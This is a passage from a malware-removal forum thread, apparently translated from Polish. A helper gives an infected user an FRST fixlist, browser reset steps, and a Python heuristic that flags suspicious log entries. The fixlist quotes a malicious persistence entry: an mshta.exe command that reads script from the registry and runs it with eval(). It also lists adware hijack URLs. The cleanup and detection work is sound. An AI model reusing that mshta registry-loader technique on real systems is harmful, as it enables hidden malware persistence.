Avast is going crazy - URL:Mal
#2
Paste the following into Notepad and save it as fixlist.txt

Code:
CloseProcesses:
CreateRestorePoint:
HKLM\...\Run: [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] => 1
HKU\S-1-5-21-2541421654-2607010386-820096111-1001\...\Run: [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] => 1
HKU\S-1-5-21-2541421654-2607010386-820096111-1001\...\Run: [**jpcp<*>] => "C:\Users\Renata\AppData\Local\05d8ce\a1da7e.bat" <===== UWAGA (Nazwa wartości zawiera nieprawidłowe znaki)
HKLM\...\Run: [LogMeIn Hamachi Ui] => "C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2016-11-04] ()
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130976921383745351&GUID=00000000-0000-0000-0000-000000000000
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-2541421654-2607010386-820096111-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.pl/
URLSearchHook: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 - (Brak nazwy) - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} -  Brak pliku
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {D06672F0-2324-488A-9AE6-CA873F85F744} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> {B41B764B-285E-49E4-9D0A-31344155BD98} URL = hxxp://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> {BA980BD6-D252-46E6-97AE-D38C0D9FD56A} URL = hxxp://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> {D06672F0-2324-488A-9AE6-CA873F85F744} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
BHO: IE7Pro BHO -> {00011268-E188-40DF-A514-835FCD78B1BF} -> C:\Program Files\IEPro\iepro.dll => Brak pliku
BHO: BitComet Helper -> {39F7E362-828A-4B5A-BCAF-5B79BFDFEA60} -> C:\Program Files\BitComet\tools\BitCometBHO_1.5.4.11.dll => Brak pliku
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll => Brak pliku
BHO: Pomocnik rejestracji usługi Windows Live -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll => Brak pliku
BHO: Assist Point -> {dc727a8c-7582-483c-a1c2-2b885f099bb5} -> C:\Program Files\Assist Point\Extensions\dc727a8c-7582-483c-a1c2-2b885f099bb5.dll => Brak pliku
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll => Brak pliku
Toolbar: HKU\S-1-5-21-2541421654-2607010386-820096111-1001 -> Brak nazwy - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  Brak pliku
DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_31-windows-i586.cab
DPF: {CAFEEFAC-0018-0000-0031-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_31-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_31-windows-i586.cab
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.dosearches.com/?utm_source=b&utm_medium=ild&utm_campaign=rg&utm_content=sc&from=ild&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969&ts=1383866143
CHR StartupUrls: Default -> "hxxp://www.sweet-page.com/?type=hp&ts=1451757252&z=7d6c6d1431717f95b1783bdg5z4w3g5m9wam9o8w1o&from=cor&uid=wdcxwd3200bekt-60v5t1_wd-wxl1a103896938969"
CHR Extension: (Chrome Media Router) - C:\Users\Renata\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-28]
CHR HKLM\...\Chrome\Extension: [lgnbhdnimikkoodkogjlcllngimhlapp] - C:\Program Files\FTDownloader.com\FTDownloader10.crx <nie znaleziono>
CHR HKLM\...\Chrome\Extension: [ljkcijnbckdflhifmbnfnkjacokloacf] - C:\Program Files\qualitink\ljkcijnbckdflhifmbnfnkjacokloacf.crx [2013-11-07]
S4 TSNxGPDService; C:\windows\system32\TSNxGPDService.exe [312680 2009-11-10] (G Data Software)
S2 Hamachi2Svc; "C:\Program Files\LogMeIn Hamachi\hamachi-2.exe" -s [X]
S2 LMIGuardianSvc; "C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe" [X]
S3 MfeAVFK; C:\windows\System32\drivers\MfeAVFK.sys [79816 2009-05-16] (McAfee, Inc.)
S3 MfeBOPK; C:\windows\System32\drivers\MfeBOPK.sys [35272 2009-05-16] (McAfee, Inc.)
R1 mfehidk; C:\windows\System32\drivers\mfehidk.sys [214024 2009-05-16] (McAfee, Inc.)
S3 MfeRKDK; C:\windows\System32\drivers\MfeRKDK.sys [34248 2009-05-16] (McAfee, Inc.)
R1 mfetdik; C:\windows\System32\drivers\mfetdik.sys [55336 2009-05-16] (McAfee, Inc.)
S3 ALSysIO; \??\C:\Users\test\AppData\Local\Temp\ALSysIO.sys [X]
S1 ccnfd_1_10_0_2; system32\drivers\ccnfd_1_10_0_2.sys [X]
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
C:\Users\Renata\AppData\Local\05d8ce
C:\Users\Renata\AppData\Local\TempbG4656.html
C:\Users\Renata\AppData\Local\TempBy3752.html
C:\Users\Renata\AppData\Local\TempDd6076.html
C:\Users\Renata\AppData\Local\Tempja2820.html
C:\Users\Renata\AppData\Local\Tempjb3752.html
C:\Users\Renata\AppData\Local\TempKCZ688.html
C:\Users\Renata\AppData\Local\TempmW2820.html
C:\Users\Renata\AppData\Local\Tempnc4656.html
C:\Users\Renata\AppData\Local\TempuEr688.html
C:\ProgramData\1405543298.bdinstall.bin
C:\ProgramData\1415795312.bdinstall.bin
C:\ProgramData\1415795314.bdinstall.bin
CustomCLSID: HKU\S-1-5-21-2541421654-2607010386-820096111-1001_Classes\CLSID\{08244EE6-92F0-47F2-9FC9-929BAA2E7235}\InprocServer32 -> Brak ścieżki do pliku
CustomCLSID: HKU\S-1-5-21-2541421654-2607010386-820096111-1001_Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32 -> Brak ścieżki do pliku
CustomCLSID: HKU\S-1-5-21-2541421654-2607010386-820096111-1001_Classes\CLSID\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\InprocServer32 -> Brak ścieżki do pliku
Task: {11B71A99-FCC0-426D-9FFD-798544D263F4} - System32\Tasks\{2E38DD82-90C9-412A-ACC3-082002449195} => pcalua.exe -a "H:\z Foxa\APPRMWIN_00017.exe" -d "H:\z Foxa"
Task: {1554A3F6-0869-4DF0-9A55-97E94F5780BD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HPSAObjUtilTask => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\UtilTask.exe [2016-10-18] (Microsoft)
Task: {25F08E32-B789-4A69-AF5C-4369CBF96978} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {321F41E6-547F-4944-B6B5-8756F6A4B1F0} - System32\Tasks\{8C5BB8E0-AF7C-4012-9F56-AB88AA718051} => pcalua.exe -a F:\startuj.exe -d F:\
Task: {3474450C-C8E1-467C-BDA1-046694126CBD} - System32\Tasks\{070E0D1B-2BA9-40B3-8B6B-9D0F4A40720E} => pcalua.exe -a "I:\z Foxa\mflpro\Data\Disk1\setup.exe" -d "I:\z Foxa\mflpro\Data\Disk1"
Task: {451C801C-7211-4112-98B4-4179C3F02351} - System32\Tasks\{8EBDBCA2-B1E7-4042-BCA7-DE622CE2036B} => pcalua.exe -a C:\Users\Renata\Downloads\IE7ProSetup_2.5.1.exe -d C:\Users\Renata\Downloads
Task: {4B061DEB-DC84-4EA2-B5EC-2EE3915B320C} - System32\Tasks\HPCeeScheduleForRenata => C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe [2009-10-07] (Hewlett-Packard)
Task: {568BF32F-0A98-4429-BC53-5B525AB615C5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2016-09-29] (HP Inc.)
Task: {72079696-7308-4925-99D3-12F050917C37} - System32\Tasks\{823CDFA2-3D41-4337-B87D-48601BEA5BED} => pcalua.exe -a "D:\DO ZAINSTALOWANIA\poszło\ImageResizerPowertoySetup.exe" -d "D:\DO ZAINSTALOWANIA\poszło"
Task: {7BC53B2F-D041-4D67-94E4-86F7EE42D962} - System32\Tasks\{0A951D64-852A-4F64-8AC4-BD35CDB371BA} => pcalua.exe -a C:\ProgramData\Uninstall\{537BF16E-7412-448C-95D8-846E85A1D817}\setup.exe -c /x {537BF16E-7412-448C-95D8-846E85A1D817}
Task: {9CF22406-3ED6-4211-869D-4FF50868EC79} - System32\Tasks\{81B9590A-9FD5-47C0-8065-E8FCABECBF93} => D:\gry\AOEII\empires2.exe [2012-09-01] (Microsoft Corporation)
Task: {9EA8E56F-14A1-413D-946F-2C98AA67E753} - System32\Tasks\{6D8A22BE-601E-4634-A63C-F33C5887939B} => pcalua.exe -a "H:\z Foxa\465-INST-WIN7-A\mflpro\Data\Disk1\setup.exe" -d "H:\z Foxa\465-INST-WIN7-A\mflpro\Data\Disk1"
Task: {A95FB6E7-90E0-4107-BD61-F1E33E9A5091} - System32\Tasks\{8F34263A-FC92-4ECB-B6C0-2E616CD31DE0} => D:\gry\AOEII\empires2.exe [2012-09-01] (Microsoft Corporation)
Task: {B7622F1B-81DD-4DCB-AE4C-8D254C9BC5B9} - System32\Tasks\ProtectedSearch\Protected Search => C:\Program Files\Protected Search\ProtectedSearch.exe <==== UWAGA
Task: {BC8CD810-7AF6-47CB-83A3-971028A83763} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [2016-02-18] (Hewlett-Packard)
Task: {BE92A9BD-4980-4C96-A0CC-4F8A94C0AE85} - System32\Tasks\{9F4EBFED-31B5-4FD8-8C9A-173028458AF0} => pcalua.exe -a C:\Users\Renata\Downloads\saSetup64.exe -d C:\Users\Renata\Downloads
Task: {C46943CB-1D1D-49F3-B7D1-29CA156B0467} - System32\Tasks\DSite => C:\Users\Renata\AppData\Roaming\DSite\UpdateProc\UpdateTask.exe [2013-06-16] () <==== UWAGA
Task: {D71ECADE-BA4D-4FCB-88B2-3AA904FA3F7C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {FD3A0AA1-1447-4E64-98F1-45C6FD239F60} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
ShortcutWithArgument: C:\Users\Renata\Desktop\Różne\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1403869930&from=smt&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969
ShortcutWithArgument: C:\Users\Renata\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.dosearches.com/?utm_source=b&utm_medium=ild&utm_campaign=rg&utm_content=sc&from=ild&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969&ts=1383866143
ShortcutWithArgument: C:\Users\Renata\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.dosearches.com/?utm_source=b&utm_medium=ild&utm_campaign=rg&utm_content=sc&from=ild&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969&ts=1383866143
ShortcutWithArgument: C:\Users\Renata\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1403869930&from=smt&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969
ShortcutWithArgument: C:\Users\Renata\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1403869930&from=smt&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1403869930&from=smt&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1403869930&from=smt&uid=WDCXWD3200BEKT-60V5T1_WD-WXL1A103896938969
AlternateDataStreams: C:\Temp:list3 [3799]
AlternateDataStreams: C:\Temp:pid1 [10]
AlternateDataStreams: C:\Temp:pid2 [10]
AlternateDataStreams: C:\Temp:rnd.dat [4]
AlternateDataStreams: C:\Temp:srv [36]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
HKU\S-1-5-21-2541421654-2607010386-820096111-1001\Software\Classes\47e557: "C:\windows\system32\mshta.exe" "javascript:U2ioQ8="TVpu";ep4=new ActiveXObject("WScript.Shell");n6rkHh="jxURGV4";Bc9xV=ep4.RegRead("HKCU\\software\\uffvge\\yyfwh");duE8d="ub4rK";eval(Bc9xV);MGw4FgeF="12VPKb";" <===== UWAGA
Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f
Hosts:
CMD: netsh advfirewall reset
EmptyTemp:

Place the saved script next to the downloaded FRST program.
Then click Fix in the program. When it finishes, show the report from this operation.

Uninstall:
qualitink 2013.11.07.204414
sweet-page
Update for Zip Opener

Firefox:
Disconnect sync (if enabled):

History menu > Clear all browsing history.

Open the menu in the top right corner > open the Help menu, marked with a red frame.

Troubleshooting Information > Refresh Firefox. The reset will not affect bookmarks and passwords.

Google Chrome:
Reset sync (if enabled):

Settings > History tab > clear
Settings > Settings tab > Show advanced settings > scroll to the very bottom and run the "Reset browser settings" option.

Download the program

run it, click Scan and then Clean

Show the report from this operation.

Make new FRST logs and post FRST.txt > Addition.txt > Shortcut.txt
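
The entries this fixlist removes fall into a few recognizable shapes: an autorun pointing into a user's AppData folder, browser shortcuts with a URL appended as an argument, and an mshta.exe command that evaluates script read from the registry. The Python sketch below is an added example, not part of the original post and not FRST's own logic; the rule names and regular expressions are assumptions chosen for illustration, and the sample lines are taken from the post with the URL and script shortened. It generalizes slightly beyond the post by also matching `vbscript:` and `http(s)://` forms.

```python
import re

# Heuristic triage rules (assumptions for this example, not FRST's logic).
RULES = [
    ("run-from-appdata",
     re.compile(r'\\Run: \[.*?\] => "?[A-Z]:\\Users\\[^\\]+\\AppData\\', re.I)),
    ("mshta-inline-script",
     re.compile(r'mshta\.exe"?\s+"?(javascript|vbscript):', re.I)),
    ("browser-shortcut-url",
     re.compile(r'^ShortcutWithArgument: .*\\(iexplore|chrome|firefox)\.exe'
                r' \(.*?\) -> (hxxp|https?)://', re.I)),
    ("registry-eval-loader",
     re.compile(r'RegRead\(.*?\).*eval\(', re.I)),
]

# Sample lines from the fixlist in the post; URL and script are shortened.
SAMPLE = r'''
HKLM\...\Run: [LogMeIn Hamachi Ui] => "C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
HKU\S-1-5-21-2541421654-2607010386-820096111-1001\...\Run: [**jpcp<*>] => "C:\Users\Renata\AppData\Local\05d8ce\a1da7e.bat"
Task: {25F08E32-B789-4A69-AF5C-4369CBF96978} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://isearch.omiga-plus.com/?type=sc
HKU\S-1-5-21-2541421654-2607010386-820096111-1001\Software\Classes\47e557: "C:\windows\system32\mshta.exe" "javascript:ep4=new ActiveXObject("WScript.Shell");Bc9xV=ep4.RegRead("HKCU\\software\\uffvge\\yyfwh");eval(Bc9xV);"
'''


def triage(log_text):
    """Return (rule_name, line) pairs for every rule that matches a line."""
    hits = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((name, line))
    return hits


if __name__ == "__main__":
    for rule, entry in triage(SAMPLE):
        print(f"{rule:22} {entry[:90]}")
```

A hit is a prompt for manual review of the entry, not a verdict; the Hamachi autorun and the Google update task in the sample pass through unflagged.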
Messages in this thread
Avast is going crazy - URL:Mal - by Netis - 05.11.2016, 16:38
RE: Avast is going crazy - URL:Mal - by tachion - 05.11.2016, 22:02
RE: Avast is going crazy - URL:Mal - by Netis - 06.11.2016, 00:25
RE: Avast is going crazy - URL:Mal - by tachion - 06.11.2016, 13:08
RE: Avast is going crazy - URL:Mal - by Netis - 07.11.2016, 11:27
RE: Avast is going crazy - URL:Mal - by tachion - 07.11.2016, 19:45
RE: Avast is going crazy - URL:Mal - by Netis - 08.11.2016, 16:37
